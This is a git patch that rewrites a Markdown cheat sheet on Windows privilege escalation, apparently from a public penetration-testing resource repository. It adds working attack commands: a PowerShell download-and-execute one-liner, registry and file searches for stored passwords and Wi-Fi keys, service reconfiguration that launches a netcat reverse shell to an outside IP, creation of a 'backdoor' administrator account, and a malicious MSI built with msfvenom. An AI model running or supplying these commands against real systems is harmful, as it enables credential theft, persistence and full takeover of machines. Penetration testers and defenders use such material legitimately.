From ecadcf3d0f25358d53285a66b1a53f14128ecd79 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 3 Mar 2019 20:01:25 +0100 Subject: [PATCH] Windows PrivEsc - Full rewrite --- .../Windows - Privilege Escalation.md | 200 ++++++++++++++++-- .../Windows - Using credentials.md | 3 +- 2 files changed, 187 insertions(+), 16 deletions(-) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 9a414df..b596fe9 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -1,18 +1,46 @@ # Windows - Privilege Escalation +## Summary + +* [Tools](#tools) +* [Windows Version and Configuration](#) +* [User Enumeration](#) +* [Network Enumeration](#) +* [EoP - Looting for passwords](#) +* [EoP - Processes Enumeration and Tasks](#) +* [EoP - Incorrect permissions in services](#) +* [EoP - Windows Subsystem for Linux (WSL)](#) +* [EoP - Unquoted Service Paths](#) +* [EoP - Kernel Exploitation](#) +* [EOP - AlwaysInstallElevated](#) +* [EoP - Insecure GUI apps](#) +* [EoP - Runas](#) + ## Tools - [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) - [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) + ```powershell + ./windows-exploit-suggester.py --update + ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt + ``` - [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) +- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) + ```powershell + powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks + ``` ## Windows Version and Configuration ```powershell systeminfo | findstr /B /C:"OS Name" /C:"OS Version" +``` + +Extract patchs and updates +```powershell wmic qfe ``` @@ -56,7 +84,7 @@ List all users ```powershell net user -net users +net user Swissky whoami /all Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name @@ -121,10 +149,15 @@ List all current connections netstat -ano ``` -List firware state and current configuration +List firewall state and current configuration ```powershell netsh advfirewall firewall dump + +or + +netsh firewall show state +netsh firewall show config ``` List all network shares @@ -140,7 +173,7 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ``` -## Looting for passwords +## EoP - Looting for passwords ### SAM and SYSTEM files @@ -153,11 +186,12 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse %SYSTEMROOT%\System32\config\RegBack\system ``` -### Search for file contents** +### Search for file contents ```powershell cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt findstr /si password *.xml *.ini *.txt *.config +findstr /spin "password" *.* ``` ### Search for a file with a certain filename @@ -166,11 +200,20 @@ findstr /si password *.xml *.ini *.txt *.config dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* ``` -### Search the registry for key names +### Search the registry for key names and passwords ```powershell REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K + +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin +reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters +reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials +reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials +reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password + +reg query HKLM /f password /t REG_SZ /s +reg query HKCU /f password /t REG_SZ /s ``` ### Read a value of a certain sub key @@ -244,6 +287,8 @@ C:\inetpub\wwwroot\web.config %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat %WINDIR%\System32\drivers\etc\hosts +dir c:*vnc.ini /s /b +dir c:*ultravnc.ini /s /b ``` ### Wifi passwords @@ -260,11 +305,11 @@ netsh wlan show profile key=clear Oneliner method to extract wifi passwords from all the access point. -````batch +```batch cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on ``` -## Processes Enumeration and Tasks +## EoP - Processes Enumeration and Tasks What processes are running? @@ -295,6 +340,14 @@ Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,Last Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name ``` +List services + +```powershell +net start +wmic service list brief +tasklist /SVC +``` + Scheduled tasks ```powershell @@ -313,16 +366,82 @@ dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" ``` +## EoP - Incorrect permissions in services -## PowerSploit's PowerUp +> A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system. -Spot the weak service using PowerSploit's PowerUp +Often, services are pointing to writeable locations: +- Orphaned installs, not installed anymore but still exist in startup +- DLL Hijacking +- PATH directories with weak permissions ```powershell -powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks +$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt +$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" + +$ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt +FOR /F %i in (Servicenames.txt) DO echo %i +type Servicenames.txt +FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt +FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt ``` -## Windows Subsystem for Linux (WSL) +Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions` + +Note to check file permissions you can use `cacls` and `icacls` +> icacls (Windows Vista +) +> cacls (Windows XP) + +You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or `BUILTIN\Users:(W)`(Write-only access) in the output. + +### Example with Windows XP SP1 + +```powershell +$ sc config upnphost binpath="C:\Inetpub\wwwroot\nc.exe YOUR_IP 1234 -e C:\WINDOWS\System32\cmd.exe" +sc config upnphost obj=".\LocalSystem" password="" +sc qc upnphost +``` + +If it fails because of a missing dependency, try the following commands. + +```powershell +sc config SSDPSRV start=auto +net start SSDPSRV +net stop upnphost +net start upnphost + +sc config upnphost depend="" +``` + +Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals. +```powershell +$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula +RW SSDPSRV + SERVICE_ALL_ACCESS +RW upnphost + SERVICE_ALL_ACCESS + +$ accesschk.exe -ucqv upnphost +upnphost + RW NT AUTHORITY\SYSTEM + SERVICE_ALL_ACCESS + RW BUILTIN\Administrators + SERVICE_ALL_ACCESS + RW NT AUTHORITY\Authenticated Users + SERVICE_ALL_ACCESS + RW BUILTIN\Power Users + SERVICE_ALL_ACCESS + +$ sc config binpath="net user backdoor backdoor123 /add" +$ sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" +$ sc stop +$ sc start +$ sc config binpath="net localgroup Administrators backdoor /add" +$ sc stop +$ sc start +``` + +## EoP - Windows Subsystem for Linux (WSL) Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032) @@ -339,17 +458,26 @@ Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-window Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` -## Unquoted Service Paths +## EoP - Unquoted Service Paths The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first. ```powershell -wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows\" |findstr /i /v """ +wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` -## Kernel Exploit +Metasploit provides the exploit : `exploit/windows/local/trusted_service_path` + +### Example + +For `C:\Program Files\something\legit.exe`, Windows will try the following paths first: +- `C:\Program.exe` +- `C:\Program Files.exe` + + +## EoP - Kernel Exploitation List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) @@ -371,8 +499,32 @@ List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](h ... - [MS03-026](./MS03-026)  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003) +## EOP - AlwaysInstallElevated -## Runas +Check if these registry values are set to "1". + +```bat +$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated + +$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated +``` + +Then create an MSI package and install it. + +```powershell +$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi +$ msiexec /quiet /qn /i C:\evil.msi +``` + +Technique also available in Metasploit : `exploit/windows/local/always_install_elevated` + +## EoP - Insecure GUI apps + +Application running as SYSTEM allowing an user to spawn a CMD, or browse directories. + +Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt" + +## EoP - Runas Use the `cmdkey` to list the stored credentials on the machine. @@ -390,8 +542,26 @@ The following example is calling a remote binary via an SMB share. runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" ``` +Using `runas` with a provided set of credential. + +```powershell +C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe" +``` + +```powershell +$ secpasswd = ConvertTo-SecureString "" -AsPlainText -Force +$ mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) +$ computer = "" +[System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) +``` + + + ## References +* [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls) +* [Privilege Escalation Windows - Philip Linghammar](https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html) +* [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop) * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index ffe4ae8..c1034cc 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -93,8 +93,9 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 ```powershell python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 -rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70% +rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70 -r disk:share=/home/user/myshare # -g : the screen will take up 70% of your actual screen size +# -r disk:share : sharing a local folder during a remote desktop session ``` Note: you may need to enable it with the following command